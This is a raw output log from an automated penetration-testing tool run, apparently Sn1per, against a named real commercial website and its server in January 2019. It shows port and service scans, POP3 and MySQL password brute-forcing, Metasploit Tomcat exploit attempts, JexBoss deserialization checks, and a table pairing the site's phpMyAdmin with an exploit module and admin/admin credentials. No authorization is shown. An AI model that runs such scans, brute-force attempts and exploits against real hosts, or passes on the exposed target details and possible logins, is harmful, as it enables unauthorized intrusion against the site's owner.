- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [23-01-2019 04:35:00]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-babylon-woodline.co.il ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:35 EST
- NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
- NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
- NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up (0.23s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot DirectAdmin pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 205 guesses in 183 seconds, average tps: 1.0
- |_pop3-capabilities: STLS PIPELINING TOP CAPA USER SASL(PLAIN) AUTH-RESP-CODE RESP-CODES UIDL
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 3.10 (89%), Linux 3.4 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 17 hops
- TRACEROUTE (using port 110/tcp)
- HOP RTT ADDRESS
- 1 144.29 ms 10.246.200.1
- 2 144.46 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
- 3 144.33 ms 176.10.83.34
- 4 144.34 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 177.54 ms prag-bb1-link.telia.net (62.115.119.72)
- 6 176.93 ms ffm-bb4-link.telia.net (62.115.133.79)
- 7 188.63 ms ffm-b1-link.telia.net (62.115.121.3)
- 8 179.30 ms 80.239.196.190
- 9 ...
- 10 230.41 ms gw2-3-1-4-hfa-gw2-fra.nv.net.il (212.143.12.76)
- 11 229.99 ms 212.143.7.39
- 12 231.18 ms core1-rha2-0-0-core1-hfa.nv.net.il (207.232.0.17)
- 13 232.71 ms core1-rha-1-0-0-core1-hfa-5-0-7.nv.net.il (212.143.12.117)
- 14 234.61 ms 212.143.201.190
- 15 230.49 ms 82-166-37-254.barak-online.net (82.166.37.254)
- 16 232.03 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 17 232.06 ms server.webid.co.il (62.90.134.182)
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://babylon-woodline.co.il
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- #######################################################################################################################################
- https://babylon-woodline.co.il [200 OK] Country[ISRAEL][IL], HTTPServer[nginx], IP[62.90.134.182], Title[Secured Home of babylon-woodline.co.il], UncommonHeaders[x-accel-version], nginx
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginChromeSha1Deprecation
- PluginHSTS
- PluginSessionRenegotiation
- PluginHeartbleed
- PluginCertInfo
- PluginOpenSSLCipherSuites
- PluginCompression
- PluginSessionResumption
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- babylon-woodline.co.il:443 => 62.90.134.182:443
- SCAN RESULTS FOR BABYLON-WOODLINE.CO.IL:443 - 62.90.134.182:443
- ---------------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * OpenSSL Heartbleed:
- OK - Not vulnerable to Heartbleed
- * Certificate - Content:
- SHA1 Fingerprint: 2e3f643e5d11a459bd85ab36e5e5593f04c8e51f
- Common Name: localhost
- Issuer: localhost
- Serial Number: 99F758FFACDEEDCB
- Not Before: Sep 20 10:18:07 2014 GMT
- Not After: Feb 4 10:18:07 2042 GMT
- Signature Algorithm: sha1WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match babylon-woodline.co.il
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
- Certificate Chain Received: ['localhost', 'COMODO High-Assurance Secure Server CA', 'AddTrust External CA Root', 'GlobalSign Root CA', 'thawte Primary Root CA', 'VeriSign Class 3 Secure Server CA - G3', 'VeriSign Class 3 Public Primary Certification Authority - G5']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * TLSV1_2 Cipher Suites:
- Preferred:
- ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
- Accepted:
- ECDHE-RSA-AES256-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
- ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
- ECDHE-RSA-AES256-GCM-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
- DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
- DHE-RSA-AES256-SHA256 DH-2048 bits 256 bits HTTP 200 OK
- DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
- DHE-RSA-AES256-GCM-SHA384 DH-2048 bits 256 bits HTTP 200 OK
- CAMELLIA256-SHA - 256 bits HTTP 200 OK
- AES256-SHA256 - 256 bits HTTP 200 OK
- AES256-SHA - 256 bits HTTP 200 OK
- AES256-GCM-SHA384 - 256 bits HTTP 200 OK
- ECDHE-RSA-AES128-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
- ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
- DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
- DHE-RSA-AES128-SHA256 DH-2048 bits 128 bits HTTP 200 OK
- DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
- DHE-RSA-AES128-GCM-SHA256 DH-2048 bits 128 bits HTTP 200 OK
- CAMELLIA128-SHA - 128 bits HTTP 200 OK
- AES128-SHA256 - 128 bits HTTP 200 OK
- AES128-SHA - 128 bits HTTP 200 OK
- AES128-GCM-SHA256 - 128 bits HTTP 200 OK
- ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
- DES-CBC3-SHA - 112 bits HTTP 200 OK
- * TLSV1_1 Cipher Suites:
- Preferred:
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
- Accepted:
- ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
- DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
- DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
- CAMELLIA256-SHA - 256 bits HTTP 200 OK
- AES256-SHA - 256 bits HTTP 200 OK
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
- DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
- DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
- CAMELLIA128-SHA - 128 bits HTTP 200 OK
- AES128-SHA - 128 bits HTTP 200 OK
- ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
- DES-CBC3-SHA - 112 bits HTTP 200 OK
- * TLSV1 Cipher Suites:
- Preferred:
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
- Accepted:
- ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
- DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
- DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
- CAMELLIA256-SHA - 256 bits HTTP 200 OK
- AES256-SHA - 256 bits HTTP 200 OK
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
- DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
- DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
- CAMELLIA128-SHA - 128 bits HTTP 200 OK
- AES128-SHA - 128 bits HTTP 200 OK
- ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
- DES-CBC3-SHA - 112 bits HTTP 200 OK
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 19.40 S
- -------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 62.90.134.182
- Testing SSL server babylon-woodline.co.il on port 443 using SNI name babylon-woodline.co.il
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha1WithRSAEncryption
- RSA Key Strength: 2048
- Subject: localhost
- Issuer: localhost
- Not valid before: Sep 20 10:18:07 2014 GMT
- Not valid after: Feb 4 10:18:07 2042 GMT
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:40 EST
- NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
- NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
- NSE: [mysql-brute] passwords: Time limit 10m00s exceeded.
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up (0.23s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- PORT STATE SERVICE VERSION
- 3306/tcp open mysql MySQL 5.5.60-MariaDB
- | mysql-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 15932 guesses in 600 seconds, average tps: 26.6
- | mysql-enum:
- | Valid usernames:
- | root:<empty> - Valid credentials
- | netadmin:<empty> - Valid credentials
- | guest:<empty> - Valid credentials
- | user:<empty> - Valid credentials
- | web:<empty> - Valid credentials
- | sysadmin:<empty> - Valid credentials
- | administrator:<empty> - Valid credentials
- | webadmin:<empty> - Valid credentials
- | admin:<empty> - Valid credentials
- | test:<empty> - Valid credentials
- |_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
- | mysql-info:
- | Protocol: 10
- | Version: 5.5.60-MariaDB
- | Thread ID: 11651486
- | Capabilities flags: 63487
- | Some Capabilities: ConnectWithDatabase, Support41Auth, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, LongPassword, Speaks41ProtocolNew, InteractiveClient, FoundRows, SupportsLoadDataLocal, IgnoreSigpipes, SupportsTransactions, LongColumnFlag, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
- | Status: Autocommit
- | Salt: >4+yC!y_OQ&jd5|3&eI!
- |_ Auth Plugin Name: mysql_native_password
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 16 hops
- TRACEROUTE (using port 3306/tcp)
- HOP RTT ADDRESS
- 1 143.63 ms 10.246.200.1
- 2 143.68 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
- 3 143.68 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
- 4 143.70 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 176.88 ms 80.91.253.248
- 6 176.92 ms 62.115.133.79
- 7 181.16 ms ffm-b1-link.telia.net (62.115.137.165)
- 8 176.96 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
- 9 ...
- 10 228.80 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 11 232.65 ms 212.143.7.35
- 12 234.84 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
- 13 237.60 ms 212.143.201.205
- 14 238.94 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
- 15 233.80 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 16 233.22 ms server.webid.co.il (62.90.134.182)
- #######################################################################################################################################
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://babylon-woodline.co.il:8080
- The site http://babylon-woodline.co.il:8080 is behind a Imperva SecureSphere
- Number of requests: 9
- http://babylon-woodline.co.il:8080 [301 Moved Permanently] Apache[2], Country[ISRAEL][IL], HTTPServer[Apache/2], IP[62.90.134.182], RedirectLocation[/index.1.html]
- http://babylon-woodline.co.il:8080/index.1.html [200 OK] Apache[2], Country[ISRAEL][IL], HTML5, HTTPServer[Apache/2], IP[62.90.134.182], JQuery, Meta-Author[ישראל ממליץ], Open-Graph-Protocol, Script[text/javascript], Title[מזרונים ליין]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 62.90.134.182
- Testing SSL server babylon-woodline.co.il on port 8080 using SNI name babylon-woodline.co.il
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:59 EST
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up (0.23s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- PORT STATE SERVICE VERSION
- 8080/tcp open ssl/http-proxy Apache/2
- |_http-server-header: Apache/2
- |_http-vuln-cve2017-5638: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.39 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 17 hops
- TRACEROUTE (using port 8080/tcp)
- HOP RTT ADDRESS
- 1 146.37 ms 10.246.200.1
- 2 146.77 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
- 3 146.42 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
- 4 146.42 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 179.82 ms prag-bb1-link.telia.net (62.115.119.70)
- 6 179.21 ms ffm-bb4-link.telia.net (62.115.133.79)
- 7 179.86 ms ffm-b1-link.telia.net (62.115.121.1)
- 8 179.26 ms 80.239.196.190
- 9 ...
- 10 233.90 ms gw2-hfa-0-2-0-2-200-gw2.fra.nv.net.il (212.143.12.13)
- 11 233.26 ms 212.143.12.32
- 12 234.29 ms 212.143.7.28
- 13 233.81 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
- 14 234.25 ms 82.166.37.254
- 15 232.54 ms 82.166.37.254
- 16 233.45 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 17 234.31 ms server.webid.co.il (62.90.134.182)
- #######################################################################################################################################
- RHOSTS => babylon-woodline.co.il
- RHOST => babylon-woodline.co.il
- [-] WAR file not found
- [*] Auxiliary module execution completed
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- RPORT => 8080
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] Attempting to connect to 62.90.134.182:8080
- [+] No File(s) found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] http://62.90.134.182:8080/admin/j_security_check - Checking j_security_check...
- [*] http://62.90.134.182:8080/admin/j_security_check - Server returned: 404
- [-] http://62.90.134.182:8080/admin/j_security_check - Unable to enumerate users with this URI
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] http://62.90.134.182:8080 - Authorization not requested
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- USERNAME => tomcat
- PASSWORD => tomcat
- [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: http://babylon-woodline.co.il:8080 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ REDIRECT ]
- * The server sent a redirect to: /HtmlAdaptor/index.1.html
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- ######################################################################################################################################
- +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
- | phpMyAdmin | https://62.90.134.182:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | admin | admin |
- | phpMyAdmin | https://62.90.134.182:8081/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
- +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:09 EST
- NSE: Loaded 149 scripts for scanning.
- NSE: Script Pre-scanning.
- NSE: Starting runlevel 1 (of 3) scan.
- Initiating NSE at 05:09
- Completed NSE at 05:09, 0.00s elapsed
- NSE: Starting runlevel 2 (of 3) scan.
- Initiating NSE at 05:09
- Completed NSE at 05:09, 0.00s elapsed
- NSE: Starting runlevel 3 (of 3) scan.
- Initiating NSE at 05:09
- Completed NSE at 05:09, 0.00s elapsed
- Initiating Ping Scan at 05:09
- Scanning babylon-woodline.co.il (62.90.134.182) [4 ports]
- Completed Ping Scan at 05:09, 0.27s elapsed (1 total hosts)
- Initiating Parallel DNS resolution of 1 host. at 05:09
- Completed Parallel DNS resolution of 1 host. at 05:09, 0.02s elapsed
- Initiating Connect Scan at 05:09
- Scanning babylon-woodline.co.il (62.90.134.182) [1000 ports]
- Discovered open port 587/tcp on 62.90.134.182
- Discovered open port 8080/tcp on 62.90.134.182
- Discovered open port 995/tcp on 62.90.134.182
- Discovered open port 143/tcp on 62.90.134.182
- Discovered open port 21/tcp on 62.90.134.182
- Discovered open port 3306/tcp on 62.90.134.182
- Discovered open port 110/tcp on 62.90.134.182
- Discovered open port 80/tcp on 62.90.134.182
- Discovered open port 53/tcp on 62.90.134.182
- Discovered open port 993/tcp on 62.90.134.182
- Discovered open port 443/tcp on 62.90.134.182
- Discovered open port 5060/tcp on 62.90.134.182
- Discovered open port 2222/tcp on 62.90.134.182
- Discovered open port 8081/tcp on 62.90.134.182
- Discovered open port 2000/tcp on 62.90.134.182
- Discovered open port 465/tcp on 62.90.134.182
- Completed Connect Scan at 05:09, 9.19s elapsed (1000 total ports)
- Initiating Service scan at 05:09
- Scanning 16 services on babylon-woodline.co.il (62.90.134.182)
- Completed Service scan at 05:09, 19.21s elapsed (16 services on 1 host)
- Initiating OS detection (try #1) against babylon-woodline.co.il (62.90.134.182)
- Retrying OS detection (try #2) against babylon-woodline.co.il (62.90.134.182)
- Initiating Traceroute at 05:09
- Completed Traceroute at 05:09, 3.03s elapsed
- Initiating Parallel DNS resolution of 15 hosts. at 05:09
- Completed Parallel DNS resolution of 15 hosts. at 05:10, 16.51s elapsed
- NSE: Script scanning 62.90.134.182.
- NSE: Starting runlevel 1 (of 3) scan.
- Initiating NSE at 05:10
- Completed NSE at 05:10, 22.76s elapsed
- NSE: Starting runlevel 2 (of 3) scan.
- Initiating NSE at 05:10
- NSE Timing: About 90.62% done; ETC: 05:11 (0:00:03 remaining)
- NSE Timing: About 92.19% done; ETC: 05:11 (0:00:05 remaining)
- NSE Timing: About 93.75% done; ETC: 05:12 (0:00:06 remaining)
- NSE Timing: About 94.53% done; ETC: 05:12 (0:00:07 remaining)
- NSE Timing: About 95.31% done; ETC: 05:13 (0:00:07 remaining)
- NSE Timing: About 97.66% done; ETC: 05:13 (0:00:04 remaining)
- Completed NSE at 05:13, 207.01s elapsed
- NSE: Starting runlevel 3 (of 3) scan.
- Initiating NSE at 05:13
- Completed NSE at 05:13, 0.00s elapsed
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up, received syn-ack ttl 50 (0.18s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- Scanned at 2019-01-23 05:09:11 EST for 285s
- Not shown: 797 closed ports, 187 filtered ports
- Reason: 797 conn-refused and 187 no-responses
- PORT STATE SERVICE REASON VERSION
- 21/tcp open ftp syn-ack ProFTPD
- |_ssl-date: TLS randomness does not represent time
- | tls-alpn:
- |_ ftp
- | tls-nextprotoneg:
- |_ ftp
- 53/tcp open domain syn-ack ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
- | dns-nsid:
- |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
- 80/tcp open http syn-ack nginx
- |_http-favicon: Unknown favicon MD5: FFF38020C5ABFF9E0F6B3AFCD2E35E75
- | http-methods:
- |_ Supported Methods: GET HEAD POST
- |_http-server-header: nginx
- | http-title: \xD7\x9E\xD7\x96\xD7\xA8\xD7\x95\xD7\xA0\xD7\x99\xD7\x9D \xD7\x9C\xD7\x99\xD7\x99\xD7\x9F
- |_Requested resource was /index.1.html
